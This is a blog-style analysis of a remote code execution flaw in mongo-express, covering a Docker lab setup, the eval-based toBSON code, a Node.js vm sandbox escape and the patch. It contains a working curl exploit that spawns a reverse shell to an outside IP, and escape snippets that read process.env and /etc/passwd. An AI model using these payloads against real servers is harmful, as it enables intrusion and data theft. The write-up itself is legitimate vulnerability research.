
Case Analysis of remote Code execution vulnerabilities

2025-01-16 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

Today I will walk you through an example analysis of a remote code execution vulnerability. I hope it is helpful to anyone who needs it; let's follow the editor's line of reasoning.

0x01 Getting to know mongo-express

mongo-express is a web-based admin interface for MongoDB, written in Node.js, Express and Bootstrap 3. It is probably the MongoDB admin interface with the most stars on GitHub; being easy to deploy and easy to use, it has become the choice of many people for managing Mongo.

0x02 Setting up the debugging environment

0x1 Starting the Docker services

Reading the official GitHub security advisory, we find that the vulnerability affects all versions below 0.54.0. We choose 0.49 as the example to test. Since a MongoDB database is also required for this environment, it can be built quickly with the following Docker commands:

Set up the MongoDB database:

docker run --name test -d mongo:3.2

Build the vulnerable mongo-express and link it to the MongoDB container above:

docker run -d -p 8081:8081 --link test:mongo mongo-express:0.49

Check the log to confirm that the connection succeeded.

0x2 Enabling the Node.js debugging option

Here is a trick: to debug Node.js you need to add the --inspect parameter at startup. Make that change in the container's startup script, then restart the container (183 is the container id in this setup):

docker restart 183

Use docker exec -it 183 bash to get a shell inside the container and check whether the debug service is listening.

Port 9229 is open, as shown in the figure above. As long as the external host can connect to port 9229 you can debug with the Chrome plug-in; either forward the port with frp or publish it with the Docker parameter -p 9229:9229.

0x3 Chrome DevTools

With the Chrome plug-in you can debug Node.js just like a JavaScript script, and it is very convenient to operate.

First download the debug plug-in.

Open about:inspect in Chrome (Chrome DevTools has supported Node.js debugging since May 2016) and click Open dedicated DevTools for Node.

Configure the connection address and port.

After that it is just like debugging JS.

Send a test request so that execution breaks on the routing branch, then start debugging the vulnerability:

curl http://127.0.0.1:8081/checkValid -d 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("bash -i >& /dev/tcp/192.168.43.176/8003 0>&1 2>&1")'

0x03 Debugging and principle analysis of the vulnerability

The principle of the vulnerability examined in this debugging session is relatively simple: the core is command splicing (user input concatenated into code), the simplest form of vulnerability. Exploiting it still takes some effort, though, because the VM sandbox has to be bypassed. Fortunately there is existing research on Node.js vm bypasses. Without further ado, look at the final vulnerable code.

string is the parameter of toBSON. BSON is the data format used by MongoDB and a close relative of JSON, although its format differs from JSON in many ways. Every BSON-related operation in mongo-express, such as creating a new document (similar to an insert in other databases), has to go through the toBSON() function.

For example, the following:

When the code flow reaches bson.toBSON the eval function is triggered. Since Node.js is used as a back-end language, the eval runs on the server side, which allows command injection and harm to the system.

exp.checkValid = function (req, res) {
  var doc = req.body.document;   // request body field, attacker-controlled
  try {
    bson.toBSON(doc);
  } catch (err) {
    console.error(err);
    return res.send('Invalid');
  }
  res.send('Valid');
};

exports.toBSON = function (string) {
  var sandbox = exports.getSandbox();
  // rewrite the helper constructors the UI accepts, then eval the whole string
  string = string.replace(/ISODate\(/g, 'new ISODate(');
  string = string.replace(/Binary\(("[^"]+")\)/g, 'Binary(new Buffer($1, "base64"))');
  vm.runInNewContext('doc = eval((' + string + '));', sandbox);
  return sandbox.doc;
};

Tracing the code, the string parameter of toBSON is document in req.body, so this part is attacker-controlled. It ends up in the vm.runInNewContext function, which is a virtual sandbox, so the next section examines how the sandbox protection is bypassed.

0x04 Node.js sandbox bypass

A sandbox is a separate environment for safely executing untrusted code without affecting the real code outside it; code execution inside a sandbox is usually restricted. Node's VM module provides an API for compiling and running code in the context of a V8 virtual machine: the code runs in a separate V8 context, so its global variables differ from those of other code. But code in the sandbox can still reach the Node process, and that is the route commonly used for the bypass.

0x1 Phenomenon

vm.js

"use strict";
const vm = require("vm");
const xyz = vm.runInNewContext(`this.constructor.constructor('return this.process.env')()`);
console.log(xyz);

You can see that this.process.env returned information about the Node.js process, which means you can get back into the main program to execute system commands.

0x2 Interpretation

In JavaScript, this points to the object it belongs to; here it already refers to an object created outside the vm context. this.constructor therefore returns the Object constructor, and the Object constructor's .constructor returns the Function constructor. The Function constructor is the most powerful function in JavaScript: it has global access and can generate a function from a string, executing arbitrary code. So it can be used to get back to the main process, and from there to RCE.

"use strict";
const vm = require("vm");
const xyz = vm.runInNewContext(`const process = this.constructor.constructor('return this.process')(); process.mainModule.require('child_process').execSync('cat /etc/passwd').toString()`);
console.log(xyz);

By the same token, vm2 can also be bypassed; see the original write-up at https://pwnisher.gitlab.io/nodejs/sandbox/2019/02/21/sandboxing-nodejs-is-hard.html for the details.

0x05 Vulnerability patching

Two diagrams illustrate the whole fix: the patch parses the BSON data with mongodb-query-parser and replaces the eval at its source.

That is the whole example analysis of the remote code execution vulnerability; for more on the topic, search the earlier articles or browse the following ones.
